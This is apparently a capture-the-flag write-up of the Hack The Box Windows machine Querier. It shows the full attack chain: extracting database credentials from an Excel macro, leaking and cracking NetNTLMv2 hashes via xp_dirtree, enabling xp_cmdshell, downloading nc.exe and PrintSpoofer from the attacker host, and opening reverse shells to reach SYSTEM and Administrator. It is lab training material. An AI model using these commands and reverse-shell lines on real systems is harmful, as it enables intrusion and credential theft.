# HTB - Querier

## Machine Info

Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.

## Enumeration

***

**Scope**

> IP Address: 10.10.10.125

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE      REASON
135/tcp  open  msrpc        syn-ack
139/tcp  open  netbios-ssn  syn-ack
445/tcp  open  microsoft-ds syn-ack
1433/tcp open  ms-sql-s     syn-ack
5985/tcp open  wsman        syn-ack


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ nmap -p135,139,445,1433,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2024-07-11T13:38:17+00:00; +7s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.10.125:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-11T13:34:28
|_Not valid after:  2054-07-11T13:34:28
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T13:38:13
|_  start_date: N/A
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
```

```
* Open ports: 135,139,445,1433,5985
* Services: RPC - SMB - MSSQL - winRM
* Versions: Microsoft SQL Server 2017 
* Important Notes: QUERIER.HTB.LOCAL
```

**RPC Enumeration**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rpcclient -U "%" $ip

rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
```

**SMB Enumeration**

`smbclient` lists the shares anonymously while `CME` fails with `STATUS_ACCESS_DENIED` (null session listing is allowed, share enumeration via the server service is not). `Reports` is not a default share, so let's explore it.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ smbclient -N -L //$ip         

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec smb $ip -u '' -p '' --shares              

SMB         10.10.10.125    445    QUERIER          [+] HTB.LOCAL\: 
SMB         10.10.10.125    445    QUERIER          [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

I mount the share on my Kali machine to explore it more easily (an empty password is accepted at the prompt):

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ sudo mount -t cifs "\\\\$ip\\Reports" ./mount
Password for root@\\10.10.10.125\Reports: 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ ls mount          
'Currency Volume Report.xlsm'

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ file mount/Currency\ Volume\ Report.xlsm 
mount/Currency Volume Report.xlsm: Microsoft Excel 2007+
```

## Initial Access

***

### **Shell as reporting**

I searched online for this file extension and found that `.xlsm` is a macro-enabled Excel workbook, which can contain embedded `Visual Basic` (VBA) code.

I searched for a tool that can extract the script from an `xlsm` file and found this one (`olevba` from the oletools suite):

{% embed url="<https://github.com/decalage2/oletools/wiki/Install>" %}

<figure><img src="/files/n8srulxIY2ELXUE9VPq0" alt=""><figcaption></figcaption></figure>

The macro script simply holds a connection string used to connect to the database and run a SQL query. The credentials are embedded in clear text:

```vb
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
```
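The connection string above was recovered with `olevba`. The script below is an added example (my code, not oletools' and not part of the original writeup) of what `olevba` does under the hood: it implements the MS-OVBA decompression applied to the module streams inside `xl/vbaProject.bin`, carves module sources out of a raw `vbaProject.bin` by looking for compressed containers whose output starts with `Attribute VB_` (every VBA module source stream does), and greps the result for `Uid=`/`Pwd=` connection-string secrets. `SAMPLE_MODULE` is a constructed module (its connection string is the one from the page) and `compress_vba_literals` is a literal-only encoder that exists only so a test module can be built offline; `olevba` itself walks the OLE compound-file directory instead of carving, which is the robust route when a stream's sectors are not contiguous.

```python
import re
import struct
import zipfile

# Constructed module source in the shape olevba recovers; connection string taken from the page.
SAMPLE_MODULE = (
    b'Attribute VB_Name = "Module1"\r\n'
    b"Sub Connect()\r\n"
    b"    Set conn = New ADODB.Connection\r\n"
    b'    conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;'
    b'Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"\r\n'
    b"    conn.Open\r\n"
    b"End Sub\r\n"
)


def decompress_vba(container: bytes) -> bytes:
    """MS-OVBA 2.4.1 decompression. Chunk header: 12-bit (size - 3), 3-bit signature 0b011, 1 flag bit.
    A compressed chunk is a run of (flag byte + 8 tokens); a token is a literal byte or a 16-bit
    back-reference whose offset/length split depends on how much of the chunk is decoded so far."""
    if not container or container[0] != 0x01:
        raise ValueError("missing container signature 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(container):
        header = struct.unpack_from("<H", container, pos)[0]
        if (header >> 12) & 0x7 != 0b011:
            if out:
                break                                  # padding after the last chunk
            raise ValueError("bad chunk signature")
        end = min(len(container), pos + (header & 0x0FFF) + 3)
        pos += 2
        chunk_start = len(out)
        if not header & 0x8000:                        # raw chunk: 4096 literal bytes
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        while pos < end:
            flags = container[pos]
            pos += 1
            for bit in range(8):
                if pos >= end:
                    break
                if not (flags >> bit) & 1:             # literal token
                    out.append(container[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]
                pos += 2
                bit_count = max((len(out) - chunk_start - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if offset > len(out) - chunk_start:
                    raise ValueError("back-reference before chunk start")
                for _ in range(length):                # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


def compress_vba_literals(data: bytes) -> bytes:
    """Minimal encoder (literal tokens only) used to build a test module offline.
    3640 input bytes plus their flag bytes fill one 4096-byte compressed chunk."""
    container = bytearray(b"\x01")
    for start in range(0, len(data), 3640):
        chunk = data[start:start + 3640]
        body = bytearray()
        for i in range(0, len(chunk), 8):
            body.append(0x00)                          # flag byte: next 8 tokens are literals
            body += chunk[i:i + 8]
        container += struct.pack("<H", 0xB000 | (len(body) - 1)) + body
    return bytes(container)


def carve_vba_sources(vba_bin: bytes) -> list:
    """Scan a raw vbaProject.bin for containers that decompress to a module source (heuristic)."""
    found = []
    for i in range(len(vba_bin) - 2):
        if vba_bin[i] != 0x01 or (struct.unpack_from("<H", vba_bin, i + 1)[0] >> 12) & 0x7 != 0b011:
            continue
        try:
            text = decompress_vba(vba_bin[i:])
        except (ValueError, struct.error):
            continue
        if text.startswith(b"Attribute VB_"):
            found.append(text)
    return found


CRED_RE = re.compile(rb'(?i)\b(uid|user id|pwd|password)=([^;"]+)')


def find_connection_secrets(source: bytes) -> dict:
    """Pull credential fields out of ADO/ODBC connection strings in a module."""
    return {k.decode().lower(): v.decode(errors="replace") for k, v in CRED_RE.findall(source)}


if __name__ == "__main__":
    import sys
    # The OOXML workbook is a zip; the VBA project lives in xl/vbaProject.bin (an OLE file).
    with zipfile.ZipFile(sys.argv[1]) as workbook:
        vba_bin = workbook.read("xl/vbaProject.bin")
    for source in carve_vba_sources(vba_bin):
        print(source.decode("latin-1"))
        print("secrets:", find_connection_secrets(source))
```

Run it as `python3 carve_vba.py 'Currency Volume Report.xlsm'`. A hand-built container such as `01 0e b0 00 "Pwd=secr" 08 "et;" 08 a0` (one chunk: eleven literals, then a copy token with offset 11 and length 11) decompresses to `Pwd=secret;Pwd=secret;`, which exercises the back-reference path that a literal-only encoder never produces.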

So the credentials are `reporting:PcwTWTHRwryjc$c6`. Let's connect to the MSSQL database.

Confirm access with `CME`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec mssql $ip -u reporting -p 'PcwTWTHRwryjc$c6' -d volume

MSSQL       10.10.10.125    1433   None             [*] None (name:10.10.10.125) (domain:volume)
MSSQL       10.10.10.125    1433   None             [+] volume\reporting:PcwTWTHRwryjc$c6
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ impacket-mssqlclient QUERIER/reporting:'PcwTWTHRwryjc$c6'@$ip -db volume -windows-auth

SQL (QUERIER\reporting  reporting@volume)>
```

I tried these credentials against the other protocols (`RPC`, `SMB`, `WinRM`), but they did not authenticate, although they are valid for MSSQL. Note that `STATUS_NO_LOGON_SERVERS` is not a wrong-password error: `CME` defaulted to the domain `HTB.LOCAL` and the host could not reach a logon server for that domain. Since `mssqlclient` authenticated the account as `QUERIER\reporting`, it is a local account, so a local logon (`--local-auth`, or `-d QUERIER`) is the right way to test it against SMB.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec smb $ip -u reporting -p 'PcwTWTHRwryjc$c6'

SMB         10.10.10.125    445    QUERIER          [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6 STATUS_NO_LOGON_SERVERS 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec winrm $ip -u reporting -p 'PcwTWTHRwryjc$c6'

HTTP        10.10.10.125    5985   QUERIER          [*] http://10.10.10.125:5985/wsman
WINRM       10.10.10.125    5985   QUERIER          [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rpcclient -U "reporting%PcwTWTHRwryjc\$c6" $ip

rpcclient $> enumdomusers
result was NT_STATUS_CONNECTION_DISCONNECTED
```

### **Shell as mssql-svc**

One classic attack from MSSQL is to make the server open a UNC path on an attacker-controlled SMB server: the SQL Server service account authenticates to it with NTLM, leaking a NetNTLMv2 challenge-response that can be cracked offline. `xp_dirtree` is executable by `public` by default, so it works from the low-privileged `reporting` login.

```bash
SQL (QUERIER\reporting  reporting@volume)> EXEC master..xp_dirtree '\\10.10.16.3\share\'
```

Start the SMB server (it must be listening before `xp_dirtree` is executed) and wait for the hash:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ impacket-smbserver -smb2support share .

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

[*] mssql-svc::QUERIER:aaaaaaaaaaaaaaaa:19a983f61b035d9c0dfecd82a3086e51:0101000000000000002bd76ddad3da01464386040bb50e2a000000000100100062006400620066006800460050005a000300100062006400620066006800460050005a0002001000710045006b00760063004a0079006f0004001000710045006b00760063004a0079006f0007000800002bd76ddad3da010600040002000000080030003000000000000000000000000030000046ff56ce98fc5308db7c4a5d9d52dc999fdd9105da31e9931733c94f2e971a8f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003300000000000000000000000000
```

<figure><img src="/files/UvkGpn19v7nkWWkNeln9" alt=""><figcaption></figcaption></figure>

Crack with `hashcat`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt

MSSQL-SVC::QUERIER:aaaaaaaaaaaaaaaa:19a983f61b035d9c0dfecd82a3086e51:0101000000000000002bd76ddad3da01464386040bb50e2a000000000100100062006400620066006800460050005a000300100062006400620066006800460050005a0002001000710045006b00760063004a0079006f0004001000710045006b00760063004a0079006f0007000800002bd76ddad3da010600040002000000080030003000000000000000000000000030000046ff56ce98fc5308db7c4a5d9d52dc999fdd9105da31e9931733c94f2e971a8f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003300000000000000000000000000:corporate568

Session..........: hashcat
Status...........: Cracked
```

Authenticate with the credentials `mssql-svc:corporate568`. `CME` marks the login as `Pwn3d!`, meaning the account is a sysadmin on the `mssql` instance:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec mssql $ip -u 'MSSQL-SVC' -p 'corporate568' -d volume

MSSQL       10.10.10.125    1433   None             [+] volume\MSSQL-SVC:corporate568 (Pwn3d!)
```

Connect to the database as that user

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ impacket-mssqlclient QUERIER/MSSQL-SVC:'corporate568'@$ip -windows-auth -db volume

SQL (QUERIER\mssql-svc  dbo@volume)> 
```

Confirm sysadmin privileges (1 means the login is a member of the `sysadmin` server role):

```sql
SQL (QUERIER\mssql-svc  dbo@volume)> select is_srvrolemember('sysadmin')
    
-   
1 
```

I want to execute system commands with `xp_cmdshell`, but it is disabled by default and must be enabled first. This needs sysadmin rights and writes a `Configuration option 'xp_cmdshell' changed` entry to the SQL Server error log, so it is a noisy step that defenders can alert on.

```sql
SQL (QUERIER\mssql-svc  dbo@volume)> EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE

[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
```

```bash
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "whoami"
output              
-----------------   
querier\mssql-svc
```

```bash
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "dir C:\Users"
output                                                 
----------------------------------------------------   

 Directory of C:\Users                                 

01/29/2019  12:41 AM    <DIR>          .               
01/29/2019  12:41 AM    <DIR>          ..              
01/28/2019  11:17 PM    <DIR>          Administrator   
01/29/2019  12:42 AM    <DIR>          mssql-svc       
01/28/2019  11:17 PM    <DIR>          Public 
```

```bash
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "type C:\Users\mssql-svc\Desktop\user.txt"
output                             
--------------------------------   
a113d259fb6b81c18xxxxxxxxxxxxxxxxxx
```

> User Flag: a113d259fb6b81c18xxxxxxxxxxxxxxxxxx

***

## Privilege Escalation

### Path 1

The service account `mssql-svc` often has `SeImpersonatePrivilege` & `SeAssignPrimaryTokenPrivilege` privileges which can be used to escalate to `SYSTEM` account

```bash
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "whoami /priv"
output                                                                             
--------------------------------------------------------------------------------   

Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    
SeImpersonatePrivilege        Impersonate a client after authentication Enabled    
SeCreateGlobalPrivilege       Create global objects                     Enabled    
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   
```

* We can use `RoguePotato` or `PrintSpoofer` together with `nc.exe` to execute this attack. Note that `Disabled` in the `whoami /priv` output only means the privilege is not currently enabled in the token; it is still held by the process and can be enabled, which is what these tools do with `SeImpersonatePrivilege`.

First download them to the Windows machine (`curl.exe` ships with Windows Server 2019, which the nmap build number 10.0.17763 identifies):

```bash
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "curl 10.10.16.3/nc.exe -o C:\Users\mssql-svc\nc.exe" 
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "curl 10.10.16.3/PrintSpoofer.exe -o C:\Users\mssql-svc\PrintSpoofer.exe" 
```

Execute `PrintSpoofer.exe` with the following syntax (full paths, because `xp_cmdshell` does not run from the user's directory; the T-SQL string is single-quoted so the inner double quotes survive) and start an `nc` listener on the Kali machine to receive the connection back:

```bash
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell 'C:\Users\mssql-svc\PrintSpoofer.exe -c "C:\Users\mssql-svc\nc.exe 10.10.16.3 1337 -e powershell"'
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49680
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
```

<figure><img src="/files/BXNrYCG6CgLqAy9qcRmq" alt=""><figcaption></figcaption></figure>

```powershell
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt

42be413e54f4658662xxxxxxxxxxxxxx
```

> Root Flag: 42be413e54f4658662xxxxxxxxxxxxxx

### Path 2

Get a shell to easily explore the system for possible escalation paths

```bash
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "C:\Users\mssql-svc\nc.exe 10.10.16.3 443 -e PowerShell"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49681

PS C:\Windows\system32>
```

Download `PowerUp.ps1`, which searches the system for common privilege-escalation misconfigurations:

```powershell
PS C:\Users\mssql-svc> curl 10.10.16.3/PowerUp.ps1 -o .\PowerUp.ps1
```

```powershell
PS C:\Users\mssql-svc> . .\PowerUp.ps1
PS C:\Users\mssql-svc> Invoke-AllChecks

<snip>
Changed   : {2019-01-28 23:12:48}                 
UserNames : {Administrator}            
NewName   : [BLANK]                                       
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml                                       
Check     : Cached GPP Files
<snip>
```

The `Cached GPP Files` check found a locally cached copy of a Group Policy Preferences `Groups.xml` (the GUID `{31B2F340-016D-11D2-945F-00C04FB984F9}` is the Default Domain Policy). The `cpassword` attribute in those files is AES-256 encrypted with a static key that Microsoft published in the MS-GPPREF specification, so any user able to read the cached file can recover the password, which is what PowerUp did here.

I downloaded the `RunasCs.exe` tool to get a shell as another user, `Administrator` in my case:

```powershell
PS C:\Users\mssql-svc> curl 10.10.16.3/RunasCs.exe -o .\RunasCs.exe
```

```powershell
PS C:\Users\mssql-svc> .\RunasCs.exe administrator 'MyUnclesAreMarioAndLuigi!!1!' powershell -r 10.10.16.3:1337
```

And we get a shell as `Administrator` on the listener :)

<figure><img src="/files/nU5kyf5vFvLEY5KeBziU" alt=""><figcaption></figcaption></figure>

```powershell
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt

42be413e54f4658662xxxxxxxxxxxxxx
```

> Root Flag: 42be413e54f4658662xxxxxxxxxxxxxx

